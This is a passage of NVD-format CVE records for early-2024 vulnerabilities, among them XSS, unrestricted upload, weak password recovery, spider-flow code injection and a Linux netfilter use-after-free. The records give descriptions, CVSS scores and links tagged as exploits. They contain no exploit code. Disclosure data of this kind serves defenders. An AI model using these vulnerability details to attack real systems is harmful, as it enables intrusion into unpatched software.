[ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0186", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/WwPWWizD2Spk", "name" : "https://note.zhaoj.in/share/WwPWWizD2Spk", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/WwPWWizD2Spk", "name" : "https://note.zhaoj.in/share/WwPWWizD2Spk", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.249444", "name" : "https://vuldb.com/?ctiid.249444", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249444", "name" : "https://vuldb.com/?ctiid.249444", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249444", "name" : "https://vuldb.com/?id.249444", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249444", "name" : "https://vuldb.com/?id.249444", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in HuiRan Host Reseller System up to 2.0.0. Affected is an unknown function of the file /user/index/findpass?do=4 of the component HTTP POST Request Handler. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249444." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:huiran_host_reseller_system_project:huiran_host_reseller_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0187", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/", "name" : "https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/", "name" : "https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:peepso:peepso:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.3.1.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0188", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk", "name" : "https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk", "name" : "https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249501", "name" : "https://vuldb.com/?ctiid.249501", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249501", "name" : "https://vuldb.com/?ctiid.249501", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249501", "name" : "https://vuldb.com/?id.249501", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249501", "name" : "https://vuldb.com/?id.249501", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in RRJ Nueva Ecija Engineer Online Portal 1.0. This affects an unknown part of the file change_password_teacher.php. The manipulation leads to weak password requirements. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-249501 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0189", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q", "name" : "https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q", "name" : "https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249502", "name" : "https://vuldb.com/?ctiid.249502", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249502", "name" : "https://vuldb.com/?ctiid.249502", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249502", "name" : "https://vuldb.com/?id.249502", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249502", "name" : "https://vuldb.com/?id.249502", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file teacher_message.php of the component Create Message Handler. The manipulation of the argument Content with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249502 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-02T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0190", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw", "name" : "https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw", "name" : "https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249503", "name" : "https://vuldb.com/?ctiid.249503", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249503", "name" : "https://vuldb.com/?ctiid.249503", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249503", "name" : "https://vuldb.com/?id.249503", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249503", "name" : "https://vuldb.com/?id.249503", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file add_quiz.php of the component Quiz Handler. The manipulation of the argument Quiz Title/Quiz Description with the input leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249503." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-02T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0191", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY", "name" : "https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY", "name" : "https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249504", "name" : "https://vuldb.com/?ctiid.249504", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249504", "name" : "https://vuldb.com/?ctiid.249504", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249504", "name" : "https://vuldb.com/?id.249504", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249504", "name" : "https://vuldb.com/?id.249504", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/uploads/. The manipulation leads to file and directory information exposure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249504." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-02T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0192", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM", "name" : "https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM", "name" : "https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249505", "name" : "https://vuldb.com/?ctiid.249505", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249505", "name" : "https://vuldb.com/?ctiid.249505", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249505", "name" : "https://vuldb.com/?id.249505", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249505", "name" : "https://vuldb.com/?id.249505", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file downloadable.php of the component Add Downloadable. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249505 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-02T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0193", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:1018", "name" : "RHSA-2024:1018", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1019", "name" : "RHSA-2024:1019", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1248", "name" : "RHSA-2024:1248", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4412", "name" : "RHSA-2024:4412", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4415", "name" : "RHSA-2024:4415", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0193", "name" : "https://access.redhat.com/security/cve/CVE-2024-0193", "refsource" : "", "tags" : [ "Mitigation", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2255653", "name" : "RHBZ#2255653", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1018", "name" : "RHSA-2024:1018", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2255653", "name" : "RHBZ#2255653", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0193", "name" : "https://access.redhat.com/security/cve/CVE-2024-0193", "refsource" : "", "tags" : [ "Mitigation", "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4415", "name" : "RHSA-2024:4415", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4412", "name" : "RHSA-2024:4412", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1248", "name" : "RHSA-2024:1248", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1019", "name" : "RHSA-2024:1019", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0194", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing", "name" : "https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing", "name" : "https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.249509", "name" : "https://vuldb.com/?ctiid.249509", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249509", "name" : "https://vuldb.com/?ctiid.249509", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249509", "name" : "https://vuldb.com/?id.249509", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249509", "name" : "https://vuldb.com/?id.249509", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in CodeAstro Internet Banking System up to 1.0. This issue affects some unknown processing of the file pages_account.php of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249509 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codeastro:internet_banking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0195", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249510", "name" : "https://vuldb.com/?ctiid.249510", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249510", "name" : "https://vuldb.com/?ctiid.249510", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249510", "name" : "https://vuldb.com/?id.249510", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249510", "name" : "https://vuldb.com/?id.249510", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-02T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0196", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md", "name" : 